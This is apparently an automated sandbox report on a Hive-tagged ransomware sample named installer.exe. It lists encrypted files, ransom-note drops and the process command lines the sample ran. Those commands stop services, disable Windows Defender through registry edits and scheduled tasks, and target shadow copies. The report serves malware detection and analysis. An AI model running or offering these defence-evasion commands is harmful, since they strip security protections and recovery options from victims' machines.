Analysis Overview
SHA256
87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177
Threat Level: Known bad
The file installer was found to be: Known bad.
Malicious Activity Summary
Deletes Windows Defender Definitions
Hive
Modifies Windows Defender Real-time Protection settings
Modifies security service
Clears Windows event logs
Deletes shadow copies
Modifies boot configuration data using bcdedit
Reads user/profile data of web browsers
Drops file in Program Files directory
Launches sc.exe
Suspicious use of WriteProcessMemory
Suspicious use of AdjustPrivilegeToken
Opens file in notepad (likely ransom note)
Suspicious behavior: EnumeratesProcesses
Runs net.exe
Interacts with shadow copies
Runs ping.exe
MITRE ATT&CK
Enterprise Matrix V6
Analysis: static1
Detonation Overview
Reported
2022-01-05 07:36
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2022-01-05 07:36
Reported
2022-01-05 07:38
Platform
win7-en-20211208
Max time kernel
127s
Max time network
120s
Command Line
Signatures
Deletes Windows Defender Definitions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Windows Defender\MpCmdRun.exe | N/A |
Hive
Modifies Windows Defender Real-time Protection settings
Modifies security service
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "4" | C:\Windows\system32\reg.exe | N/A |
Clears Windows event logs
Deletes shadow copies
Modifies boot configuration data using bcdedit
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
Reads user/profile data of web browsers
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files (x86)\Windows Media Player\Media Renderer\avtransport.xml | C:\Users\Admin\AppData\Local\Temp\installer.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.apache.batik.css_1.7.0.v201011041433.jar.W-mh58ELOt5UCfVNqw4O0TJ4L_vWJ4awCi-CNqd2LX7_AAAAAAAAAAA0.bvddx | C:\Users\Admin\AppData\Local\Temp\installer.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\flower_m.png | C:\Users\Admin\AppData\Local\Temp\installer.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0149407.WMF.W-mh58ELOt5UCfVNqw4O0TJ4L_vWJ4awCi-CNqd2LX7_IAAAACAAAAA0.bvddx | C:\Users\Admin\AppData\Local\Temp\installer.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\DELETE.GIF.W-mh58ELOt5UCfVNqw4O0TJ4L_vWJ4awCi-CNqd2LX7_AAAAAAAAAAA0.bvddx | C:\Users\Admin\AppData\Local\Temp\installer.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\DGLINACC.DPV.W-mh58ELOt5UCfVNqw4O0TJ4L_vWJ4awCi-CNqd2LX7_AAAAAAAAAAA0.bvddx | C:\Users\Admin\AppData\Local\Temp\installer.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\System\msadc\fr-FR\msadcer.dll.mui | C:\Users\Admin\AppData\Local\Temp\installer.exe | N/A |
| File opened for modification | C:\Program Files\DVD Maker\Shared\DvdStyles\Travel\16_9-frame-image-inset.png | C:\Users\Admin\AppData\Local\Temp\installer.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\about.html.W-mh58ELOt5UCfVNqw4O0TJ4L_vWJ4awCi-CNqd2LX7_AAAAAAAAAAA0.bvddx | C:\Users\Admin\AppData\Local\Temp\installer.exe | N/A |
| File opened for modification | C:\Program Files\DVD Maker\Shared\DvdStyles\Rectangles\vistabg.png | C:\Users\Admin\AppData\Local\Temp\installer.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\Currency.Gadget\en-US\gadget.xml | C:\Users\Admin\AppData\Local\Temp\installer.exe | N/A |
| File created | C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\rFSH_HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\installer.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre7\lib\deploy\messages_zh_CN.properties.W-mh58ELOt5UCfVNqw4O0TJ4L_vWJ4awCi-CNqd2LX7_AAAAAAAAAAA0.bvddx | C:\Users\Admin\AppData\Local\Temp\installer.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre7\lib\zi\America\Manaus.W-mh58ELOt5UCfVNqw4O0TJ4L_vWJ4awCi-CNqd2LX7_AAAAAAAAAAA0.bvddx | C:\Users\Admin\AppData\Local\Temp\installer.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\BS01635_.WMF.W-mh58ELOt5UCfVNqw4O0TJ4L_vWJ4awCi-CNqd2LX7_AAAAAAAAAAA0.bvddx | C:\Users\Admin\AppData\Local\Temp\installer.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\PDIR33F.GIF.W-mh58ELOt5UCfVNqw4O0TJ4L_vWJ4awCi-CNqd2LX7_AAAAAAAAAAA0.bvddx | C:\Users\Admin\AppData\Local\Temp\installer.exe | N/A |
| File created | C:\Program Files\VideoLAN\VLC\locale\ky\LC_MESSAGES\rFSH_HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\installer.exe | N/A |
| File opened for modification | C:\Program Files\DVD Maker\Shared\DvdStyles\Travel\button-bullet.png | C:\Users\Admin\AppData\Local\Temp\installer.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre7\lib\zi\Pacific\Gambier.W-mh58ELOt5UCfVNqw4O0TJ4L_vWJ4awCi-CNqd2LX7_AAAAAAAAAAA0.bvddx | C:\Users\Admin\AppData\Local\Temp\installer.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_moon-full.png | C:\Users\Admin\AppData\Local\Temp\installer.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\CPU.Gadget\images\dial_sml.png | C:\Users\Admin\AppData\Local\Temp\installer.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\profileRegistry\JMC.profile\1423861240811.profile.gz.W-mh58ELOt5UCfVNqw4O0TJ4L_vWJ4awCi-CNqd2LX7_AAAAAAAAAAA0.bvddx | C:\Users\Admin\AppData\Local\Temp\installer.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-keyring-fallback_ja.jar.W-mh58ELOt5UCfVNqw4O0TJ4L_vWJ4awCi-CNqd2LX7_AAAAAAAAAAA0.bvddx | C:\Users\Admin\AppData\Local\Temp\installer.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD14583_.GIF.W-mh58ELOt5UCfVNqw4O0TJ4L_vWJ4awCi-CNqd2LX7_AAAAAAAAAAA0.bvddx | C:\Users\Admin\AppData\Local\Temp\installer.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\LINES\BD21390_.GIF.W-mh58ELOt5UCfVNqw4O0TJ4L_vWJ4awCi-CNqd2LX7_IAAAACAAAAA0.bvddx | C:\Users\Admin\AppData\Local\Temp\installer.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\form_edit.js.W-mh58ELOt5UCfVNqw4O0TJ4L_vWJ4awCi-CNqd2LX7_AAAAAAAAAAA0.bvddx | C:\Users\Admin\AppData\Local\Temp\installer.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18234_.WMF.W-mh58ELOt5UCfVNqw4O0TJ4L_vWJ4awCi-CNqd2LX7_IAAAACAAAAA0.bvddx | C:\Users\Admin\AppData\Local\Temp\installer.exe | N/A |
| File created | C:\Program Files\Java\jre7\lib\zi\Australia\rFSH_HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\installer.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\System\msadc\handler.reg | C:\Users\Admin\AppData\Local\Temp\installer.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.jetty.http_8.1.14.v20131031.jar.W-mh58ELOt5UCfVNqw4O0TJ4L_vWJ4awCi-CNqd2LX7_IAAAACAAAAA0.bvddx | C:\Users\Admin\AppData\Local\Temp\installer.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre7\lib\zi\America\Indiana\Tell_City.W-mh58ELOt5UCfVNqw4O0TJ4L_vWJ4awCi-CNqd2LX7_AAAAAAAAAAA0.bvddx | C:\Users\Admin\AppData\Local\Temp\installer.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre7\lib\zi\Pacific\Kwajalein.W-mh58ELOt5UCfVNqw4O0TJ4L_vWJ4awCi-CNqd2LX7_AAAAAAAAAAA0.bvddx | C:\Users\Admin\AppData\Local\Temp\installer.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PE02270_.WMF.W-mh58ELOt5UCfVNqw4O0TJ4L_vWJ4awCi-CNqd2LX7_IAAAACAAAAA0.bvddx | C:\Users\Admin\AppData\Local\Temp\installer.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Common Files\microsoft shared\ink\en-US\mshwLatin.dll.mui | C:\Users\Admin\AppData\Local\Temp\installer.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PARNT_03.MID.W-mh58ELOt5UCfVNqw4O0TJ4L_vWJ4awCi-CNqd2LX7_IAAAACAAAAA0.bvddx | C:\Users\Admin\AppData\Local\Temp\installer.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO00390_.WMF.W-mh58ELOt5UCfVNqw4O0TJ4L_vWJ4awCi-CNqd2LX7_AAAAAAAAAAA0.bvddx | C:\Users\Admin\AppData\Local\Temp\installer.exe | N/A |
| File opened for modification | C:\Program Files\DVD Maker\Shared\DvdStyles\Memories\Notes_btn-back-static.png | C:\Users\Admin\AppData\Local\Temp\installer.exe | N/A |
| File opened for modification | C:\Program Files\DVD Maker\Shared\Parity.fx | C:\Users\Admin\AppData\Local\Temp\installer.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Games\Multiplayer\Checkers\ja-JP\chkrzm.exe.mui.W-mh58ELOt5UCfVNqw4O0TJ4L_vWJ4awCi-CNqd2LX7_AAAAAAAAAAA0.bvddx | C:\Users\Admin\AppData\Local\Temp\installer.exe | N/A |
| File opened for modification | C:\Program Files\Mozilla Firefox\browser\VisualElements\VisualElements_70.png.W-mh58ELOt5UCfVNqw4O0TJ4L_vWJ4awCi-CNqd2LX7_IAAAACAAAAA0.bvddx | C:\Users\Admin\AppData\Local\Temp\installer.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\system_settings.png | C:\Users\Admin\AppData\Local\Temp\installer.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\Groove\Sounds\People\HICCUP.WAV.W-mh58ELOt5UCfVNqw4O0TJ4L_vWJ4awCi-CNqd2LX7_AAAAAAAAAAA0.bvddx | C:\Users\Admin\AppData\Local\Temp\installer.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Media Player\Skins\Revert.wmz | C:\Users\Admin\AppData\Local\Temp\installer.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_gray_few-showers.png | C:\Users\Admin\AppData\Local\Temp\installer.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD10337_.GIF.W-mh58ELOt5UCfVNqw4O0TJ4L_vWJ4awCi-CNqd2LX7_AAAAAAAAAAA0.bvddx | C:\Users\Admin\AppData\Local\Temp\installer.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\PDIR41F.GIF.W-mh58ELOt5UCfVNqw4O0TJ4L_vWJ4awCi-CNqd2LX7_AAAAAAAAAAA0.bvddx | C:\Users\Admin\AppData\Local\Temp\installer.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Couture.xml.W-mh58ELOt5UCfVNqw4O0TJ4L_vWJ4awCi-CNqd2LX7_AAAAAAAAAAA0.bvddx | C:\Users\Admin\AppData\Local\Temp\installer.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\SECREC.CFG.W-mh58ELOt5UCfVNqw4O0TJ4L_vWJ4awCi-CNqd2LX7_AAAAAAAAAAA0.bvddx | C:\Users\Admin\AppData\Local\Temp\installer.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\bg_Groove.gif.W-mh58ELOt5UCfVNqw4O0TJ4L_vWJ4awCi-CNqd2LX7_AAAAAAAAAAA0.bvddx | C:\Users\Admin\AppData\Local\Temp\installer.exe | N/A |
| File opened for modification | C:\Program Files\DVD Maker\Shared\DvdStyles\FlipPage\NavigationLeft_ButtonGraphic.png | C:\Users\Admin\AppData\Local\Temp\installer.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\CPU.Gadget\ja-JP\js\cpu.js | C:\Users\Admin\AppData\Local\Temp\installer.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\Calendar.Gadget\de-DE\js\calendar.js | C:\Users\Admin\AppData\Local\Temp\installer.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\21.png | C:\Users\Admin\AppData\Local\Temp\installer.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0313896.JPG.W-mh58ELOt5UCfVNqw4O0TJ4L_vWJ4awCi-CNqd2LX7_IAAAACAAAAA0.bvddx | C:\Users\Admin\AppData\Local\Temp\installer.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\FLYER.DPV.W-mh58ELOt5UCfVNqw4O0TJ4L_vWJ4awCi-CNqd2LX7_IAAAACAAAAA0.bvddx | C:\Users\Admin\AppData\Local\Temp\installer.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Media Player\Media Renderer\DMR_120.png | C:\Users\Admin\AppData\Local\Temp\installer.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\CPU.Gadget\images\glass.png | C:\Users\Admin\AppData\Local\Temp\installer.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0148757.JPG.W-mh58ELOt5UCfVNqw4O0TJ4L_vWJ4awCi-CNqd2LX7_AAAAAAAAAAA0.bvddx | C:\Users\Admin\AppData\Local\Temp\installer.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0238983.WMF.W-mh58ELOt5UCfVNqw4O0TJ4L_vWJ4awCi-CNqd2LX7_AAAAAAAAAAA0.bvddx | C:\Users\Admin\AppData\Local\Temp\installer.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_blue_partly-cloudy.png | C:\Users\Admin\AppData\Local\Temp\installer.exe | N/A |
| File created | C:\Program Files (x86)\Common Files\microsoft shared\OFFICE14\Office Setup Controller\Proof.fr\rFSH_HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\installer.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\BLUEPRNT\BLUEPRNT.INF.W-mh58ELOt5UCfVNqw4O0TJ4L_vWJ4awCi-CNqd2LX7_AAAAAAAAAAA0.bvddx | C:\Users\Admin\AppData\Local\Temp\installer.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0160590.WMF.W-mh58ELOt5UCfVNqw4O0TJ4L_vWJ4awCi-CNqd2LX7_AAAAAAAAAAA0.bvddx | C:\Users\Admin\AppData\Local\Temp\installer.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO02227_.WMF.W-mh58ELOt5UCfVNqw4O0TJ4L_vWJ4awCi-CNqd2LX7_AAAAAAAAAAA0.bvddx | C:\Users\Admin\AppData\Local\Temp\installer.exe | N/A |
Launches sc.exe
Interacts with shadow copies
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\vssadmin.exe | N/A |
Opens file in notepad (likely ransom note)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\notepad.exe | N/A |
Runs net.exe
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\installer.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\installer.exe
"C:\Users\Admin\AppData\Local\Temp\installer.exe"
C:\Windows\system32\net.exe
net.exe stop "NetMsmqActivator" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "NetMsmqActivator" /y
C:\Windows\system32\net.exe
net.exe stop "SamSs" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SamSs" /y
C:\Windows\system32\net.exe
net.exe stop "SDRSVC" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SDRSVC" /y
C:\Windows\system32\net.exe
net.exe stop "SstpSvc" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SstpSvc" /y
C:\Windows\system32\net.exe
net.exe stop "UI0Detect" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "UI0Detect" /y
C:\Windows\system32\net.exe
net.exe stop "VSS" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "VSS" /y
C:\Windows\system32\net.exe
net.exe stop "wbengine" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "wbengine" /y
C:\Windows\system32\net.exe
net.exe stop "WebClient" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "WebClient" /y
C:\Windows\system32\sc.exe
sc.exe config "NetMsmqActivator" start= disabled
C:\Windows\system32\sc.exe
sc.exe config "SamSs" start= disabled
C:\Windows\system32\sc.exe
sc.exe config "SDRSVC" start= disabled
C:\Windows\system32\sc.exe
sc.exe config "SstpSvc" start= disabled
C:\Windows\system32\sc.exe
sc.exe config "UI0Detect" start= disabled
C:\Windows\system32\sc.exe
sc.exe config "VSS" start= disabled
C:\Windows\system32\sc.exe
sc.exe config "wbengine" start= disabled
C:\Windows\system32\sc.exe
sc.exe config "WebClient" start= disabled
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
C:\Windows\system32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
C:\Windows\system32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
C:\Windows\system32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
C:\Windows\system32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
C:\Windows\system32\reg.exe
reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f
C:\Windows\system32\reg.exe
reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f
C:\Windows\system32\reg.exe
reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f
C:\Windows\system32\reg.exe
reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\system32\reg.exe
reg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\system32\reg.exe
reg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\system32\reg.exe
